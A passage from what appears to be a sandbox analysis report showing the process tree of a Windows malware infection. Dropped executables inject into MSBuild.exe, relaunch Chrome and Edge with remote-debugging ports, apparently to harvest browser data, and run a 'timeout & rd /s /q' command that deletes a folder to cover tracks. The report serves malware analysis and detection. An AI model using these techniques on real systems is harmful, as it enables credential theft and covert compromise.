                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:8
                                                                                                                                            20⤵
                                                                                                                                              PID:28852
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:1
                                                                                                                                              20⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:28764
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=3160 /prefetch:1
                                                                                                                                              20⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:28720
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:2
                                                                                                                                              20⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:26320
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3108,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=4648 /prefetch:1
                                                                                                                                              20⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              PID:9004
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5332,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=5344 /prefetch:8
                                                                                                                                              20⤵
                                                                                                                                                PID:7040
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,15480021977984473286,12777690966095072249,262144 --variations-seed-version --mojo-platform-channel-handle=5368 /prefetch:8
                                                                                                                                                20⤵
                                                                                                                                                  PID:11144
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                19⤵
                                                                                                                                                • Uses browser remote debugging
                                                                                                                                                PID:8236
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                                                                                                                  20⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                  PID:12004
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ff9d620f208,0x7ff9d620f214,0x7ff9d620f220
                                                                                                                                                    21⤵
                                                                                                                                                      PID:5156
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1728,i,12913638679386595360,8184099287792601916,262144 --variations-seed-version --mojo-platform-channel-handle=2484 /prefetch:3
                                                                                                                                                      21⤵
                                                                                                                                                        PID:6300
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2444,i,12913638679386595360,8184099287792601916,262144 --variations-seed-version --mojo-platform-channel-handle=2440 /prefetch:2
                                                                                                                                                        21⤵
                                                                                                                                                          PID:10152
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2208,i,12913638679386595360,8184099287792601916,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:8
                                                                                                                                                          21⤵
                                                                                                                                                            PID:4644
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,12913638679386595360,8184099287792601916,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                                                                                            21⤵
                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                            PID:7196
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3488,i,12913638679386595360,8184099287792601916,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
                                                                                                                                                            21⤵
                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                            PID:5844
                                                                                                                                                      • C:\ProgramData\7gv37q9zcb.exe
                                                                                                                                                        "C:\ProgramData\7gv37q9zcb.exe"
                                                                                                                                                        19⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:24736
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          20⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:24696
                                                                                                                                                      • C:\ProgramData\djwl6pzua1.exe
                                                                                                                                                        "C:\ProgramData\djwl6pzua1.exe"
                                                                                                                                                        19⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:23488
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          20⤵
                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:23448
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                            21⤵
                                                                                                                                                            • Uses browser remote debugging
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                            PID:25524
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x224,0x228,0x22c,0x220,0x1fc,0x7ff9d591dcf8,0x7ff9d591dd04,0x7ff9d591dd10
                                                                                                                                                              22⤵
                                                                                                                                                                PID:7588
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:3
                                                                                                                                                                22⤵
                                                                                                                                                                  PID:28220
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2588,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:2
                                                                                                                                                                  22⤵
                                                                                                                                                                    PID:28216
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2088,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=2804 /prefetch:8
                                                                                                                                                                    22⤵
                                                                                                                                                                      PID:28176
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                                                                                      22⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:26284
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3284,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                                      22⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:26300
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4284,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=4300 /prefetch:2
                                                                                                                                                                      22⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:27212
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4656,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=4684 /prefetch:1
                                                                                                                                                                      22⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:27712
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
                                                                                                                                                                      22⤵
                                                                                                                                                                        PID:27204
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5604,i,15608572856470928718,17758248472992386275,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
                                                                                                                                                                        22⤵
                                                                                                                                                                          PID:26872
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                                        PID:26572
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                          PID:11400
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ff9d620f208,0x7ff9d620f214,0x7ff9d620f220
                                                                                                                                                                            23⤵
                                                                                                                                                                              PID:8536
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17912082693343901959,14204248352044744268,262144 --variations-seed-version --mojo-platform-channel-handle=2672 /prefetch:3
                                                                                                                                                                              23⤵
                                                                                                                                                                                PID:7988
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2644,i,17912082693343901959,14204248352044744268,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:2
                                                                                                                                                                                23⤵
                                                                                                                                                                                  PID:8500
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2200,i,17912082693343901959,14204248352044744268,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:8
                                                                                                                                                                                  23⤵
                                                                                                                                                                                    PID:2200
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,17912082693343901959,14204248352044744268,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
                                                                                                                                                                                    23⤵
                                                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                                                    PID:14236
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,17912082693343901959,14204248352044744268,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
                                                                                                                                                                                    23⤵
                                                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                                                    PID:14192
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\FBGHIIJDGH.exe"
                                                                                                                                                                                21⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:10120
                                                                                                                                                                                • C:\Users\Admin\FBGHIIJDGH.exe
                                                                                                                                                                                  "C:\Users\Admin\FBGHIIJDGH.exe"
                                                                                                                                                                                  22⤵
                                                                                                                                                                                    PID:5512
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                      23⤵
                                                                                                                                                                                        PID:18772
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\HCFCFHJDBK.exe"
                                                                                                                                                                                    21⤵
                                                                                                                                                                                      PID:6440
                                                                                                                                                                                      • C:\Users\Admin\HCFCFHJDBK.exe
                                                                                                                                                                                        "C:\Users\Admin\HCFCFHJDBK.exe"
                                                                                                                                                                                        22⤵
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:7924
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                          23⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:16364
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\CFBAKKJDBK.exe"
                                                                                                                                                                                      21⤵
                                                                                                                                                                                        PID:6064
                                                                                                                                                                                        • C:\Users\Admin\CFBAKKJDBK.exe
                                                                                                                                                                                          "C:\Users\Admin\CFBAKKJDBK.exe"
                                                                                                                                                                                          22⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:25464
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4cxDnySb\HJwxT3gyZcyDjLpM.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4cxDnySb\HJwxT3gyZcyDjLpM.exe 0
                                                                                                                                                                                            23⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:1728
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4cxDnySb\dzKSwBkela1Hm0Zt.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4cxDnySb\dzKSwBkela1Hm0Zt.exe 1728
                                                                                                                                                                                              24⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:8004
                                                                                                                                                                                  • C:\ProgramData\wbaa16ph4o.exe
                                                                                                                                                                                    "C:\ProgramData\wbaa16ph4o.exe"
                                                                                                                                                                                    19⤵
                                                                                                                                                                                      PID:23316
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qVnlW0Lq\gEtfe2ScVzMMgbdR.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\qVnlW0Lq\gEtfe2ScVzMMgbdR.exe 0
                                                                                                                                                                                        20⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:23296
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qVnlW0Lq\h8xOksdHAUSJf6vT.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qVnlW0Lq\h8xOksdHAUSJf6vT.exe 23296
                                                                                                                                                                                          21⤵
                                                                                                                                                                                            PID:23264
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 23264 -s 1016
                                                                                                                                                                                              22⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:27828
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 23296 -s 800
                                                                                                                                                                                            21⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:24068
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\8qiek" & exit
                                                                                                                                                                                        19⤵
                                                                                                                                                                                          PID:25416
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 11
                                                                                                                                                                                            20⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:25460
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IDAEHCFHJJ.exe"
                                                                                                                                                                                    16⤵
                                                                                                                                                                                      PID:32172
                                                                                                                                                                                      • C:\Users\Admin\IDAEHCFHJJ.exe
                                                                                                                                                                                        "C:\Users\Admin\IDAEHCFHJJ.exe"
                                                                                                                                                                                        17⤵
                                                                                                                                                                                          PID:8900
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                            18⤵
                                                                                                                                                                                              PID:29268
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\CGIDHIIJKE.exe"
                                                                                                                                                                                          16⤵
                                                                                                                                                                                            PID:29036
                                                                                                                                                                                            • C:\Users\Admin\CGIDHIIJKE.exe
                                                                                                                                                                                              "C:\Users\Admin\CGIDHIIJKE.exe"
                                                                                                                                                                                              17⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:28400
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\uYJT92vM\zb1kencghV5UrnnR.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\uYJT92vM\zb1kencghV5UrnnR.exe 0
                                                                                                                                                                                                18⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:32408
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\uYJT92vM\HBJWV4H7pgnJRmVw.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\uYJT92vM\HBJWV4H7pgnJRmVw.exe 32408
                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                    PID:32444
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 32444 -s 764
                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:25060
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uYJT92vM\rF8gs20bTN0uw0iU.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\uYJT92vM\rF8gs20bTN0uw0iU.exe 32408
                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                      PID:24672
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 24672 -s 760
                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:18940
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 32408 -s 948
                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4800
                                                                                                                                                                                          • C:\ProgramData\ctr1d2d2v3.exe
                                                                                                                                                                                            "C:\ProgramData\ctr1d2d2v3.exe"
                                                                                                                                                                                            14⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:31364
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aEE32Vvz\Heya7spDwCZ0ZxD6.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\aEE32Vvz\Heya7spDwCZ0ZxD6.exe 0
                                                                                                                                                                                              15⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:31380
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\aEE32Vvz\7Q2nVuoSQUErZztH.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\aEE32Vvz\7Q2nVuoSQUErZztH.exe 31380
                                                                                                                                                                                                16⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
